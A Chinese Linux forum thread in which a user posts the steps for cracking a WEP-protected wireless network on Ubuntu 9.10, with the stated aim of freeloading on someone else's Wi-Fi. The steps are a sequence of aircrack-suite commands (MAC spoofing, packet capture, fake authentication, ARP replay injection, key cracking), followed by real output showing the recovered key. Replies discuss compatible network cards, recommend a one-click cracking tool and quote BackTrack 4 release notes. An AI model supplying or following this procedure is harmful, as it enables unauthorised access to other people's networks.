ubuntu9.10使用BackTrack 3破解无线网络使用全解

[4daniel]

为达到 "噌网"目的 ,终于在 9.10下实现了.


open shell1
1)sudo airmon-ng
2)sudo airmon-ng stop eth1
3)sudo ifconfig eth1 down
4)sudo macchanger --mac 00:11:22:33:44:55 eth1
5)sudo airmon-ng start eth1 {copy bssid}
6)sudo airodump-ng -c [#ch] -w [file name] --bssid [bssid] eth1

7)open another shell2
1>sudo aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55 -e [essid] eth1
2>sudo aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:55 eth1

8)open shell3
sudo aircrack-ng -b [bssid] [file name-01.cap]

$ sudo aircrack-ng -b 00:1D:5A:CC:B3:E1 Canar-01.cap

Opening Canar-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 174633 ivs.


Aircrack-ng 1.0 rc3


[00:00:11] Tested 431730 keys (got 174633 IVs)

KB depth byte(vote)
0 0/ 1 27(241920) A6(193536) C0(193536) 9A(190720) 78(190464) 91(189696) 22(189440) 9C(189184) 03(188928) 38(188928)
1 0/ 1 96(232704) 81(194560) 09(194304) 20(192000) 15(188928) 59(188672) 02(187904) 83(187648) D8(187648) 82(187136)
2 0/ 1 67(251392) 60(196352) 65(192512) 78(190464) C5(190464) 76(189696) D9(189696) 29(187648) B1(187648) 50(186880)
3 0/ 1 74(254720) 0F(200192) E8(192256) 81(190720) 50(188672) C8(187904) 27(187392) 3B(187392) 33(186624) 87(186368)
4 0/ 1 37(231168) B0(195072) 12(190720) 51(188928) DE(187392) E4(187392) A3(186624) 35(186112) 95(185856) C7(185344)
5 0/ 1 95(233728) 9A(196608) E8(188928) CE(188672) 61(187648) DA(187648) 77(187392) 5D(187136) 62(187136) FF(186880)
6 0/ 1 95(228608) 56(190208) FB(189696) 0D(188672) 96(187904) BF(187648) 4E(187136) 5F(186880) 37(185856) 68(185856)
7 0/ 1 15(239616) 2A(195584) 32(191488) A2(190208) 58(189696) FC(189696) 11(188672) 21(188672) A8(188416) AA(188416)
8 0/ 1 14(221952) CD(193792) 8E(189696) EF(189696) 10(188928) 1E(186880) F8(186624) 27(186112) 4C(186112) 41(185856)
9 0/ 1 89(229376) 39(191488) 12(190464) 50(190464) F4(188928) 3A(188416) AA(187904) CB(187136) 97(186880) E9(186880)
10 0/ 1 FB(192768) 65(191488) 81(189696) FD(189696) DF(188672) 9F(188416) C7(188416) CE(187904) A3(187648) 00(187136)
11 1/ 1 B0(190464) 3C(190208) 6C(189952) D3(189952) 43(187904) 89(187904) E6(187904) 2A(186368) C8(186112) FE(185856)
12 0/ 7 A6(193980) 88(192620) 08(192584) AB(190300) 42(189960) 37(189304) 48(187116) D0(186852) 5A(185736) 61(185648)

KEY FOUND! [ 27:96:67:74:37:95:95:15:14:89:96:70:97 ]
Decrypted correctly: 100%

实际密码是: 27966774379595151489967097

[eexpress]

这密码太bt了
aircrack-ng 没刷出来过。nnnd

[dwl301]

你用用的是什么网卡？

[4daniel]

你用用的是什么网卡？

Interface Chipset Driver

eth1 Intel 2200BG ipw2200

[mech]

如果你用的是32位版的9.10，上网下个spoonwep 2.0，傻瓜式破解。

[wangdu2002]

这也搞得定。。。无线方便不保险啊。。。

[dwl301]

你用用的是什么网卡？

Interface Chipset Driver

eth1 Intel 2200BG ipw2200

我本子上的是Intel Corporation PRO/Wireless 2200GB[Calexico2]，不知道行不行呢。。。

[sirniu]

回去好好试试

[restar]

跟BackTrack 3有什么关系？

[sirniu]

BT3是操作系統，裏面有上面提到的破解軟件

[restar]

明明说是用ubuntu9.10吗？为什么又要扯上BackTrack 3

[spectater]

明明说是用ubuntu9.10吗？为什么又要扯上BackTrack 3

BackTrack 4基本上是个ubuntu的衍生版

BackTrack 4 Beta released The Remote Exploit Development Team is happy to announce the release of BackTrack 4 Beta. We have taken huge conceptual leaps with BackTrack 4, and have some new and exciting features. The most significant of these changes is our expansion from the realm of a Pentesting LiveCD towards a full blown "Distribution".

Now based on Debian core packages and utilizing the Ubuntu software repositories, BackTrack 4 can be upgraded in case of update. When syncing with our BackTrack repositories, you will regularly get security tool updates soon after they are released.

Some of the new features include:
* Kernel 2.6.28.1 with better hardware support.
* Native support for Pico e12 and e16 cards is now fully functional, making BackTrack the first pentesting distro to fully utilize these awesome tiny machines.
* Support for PXE Boot - Boot BackTrack over the network with PXE supported cards!
* SAINT EXPLOIT - kindly provided by SAINT corporation for our users with a limited number of free IPs.
* MALTEGO - The guys over at Paterva did outstanding work with Maltego 2.0.2 - which is featured in BackTrack as a community edition.
* The latest mac80211 wireless injection pacthes are applied, with several custom patches for rtl8187 injection speed enhancements. Wireless injection support has never been so broad and functional.
* Unicornscan - Fully functional with postgress logging support and a web front end.
* RFID support
* Pyrit CUDA support...
* New and updated tools - the list is endless!

We consider the Beta to be stable and usable. Some tools were kept back from this version, and will be soon added to the repositories.

If you would like to add a link to BackTrack downloads to your website, please use http://www.remote-exploit.org/backtrack_download.html as the download link.

[spectater]

bt4 以前的版本，基于slax/slackware

http://www.slax.org/forum.php?action=vi ... ntID=32755


其实只要是主流的linux发行版，都可以用来破解无线网络， ubuntu应该可以直接使用bt4的软件源， 其实ubuntu官方源中也有这些东西。

[nuanhuai]

日，买看懂加密方式 wep ？ wpa？

[bfdxw]

看来我要mac过滤了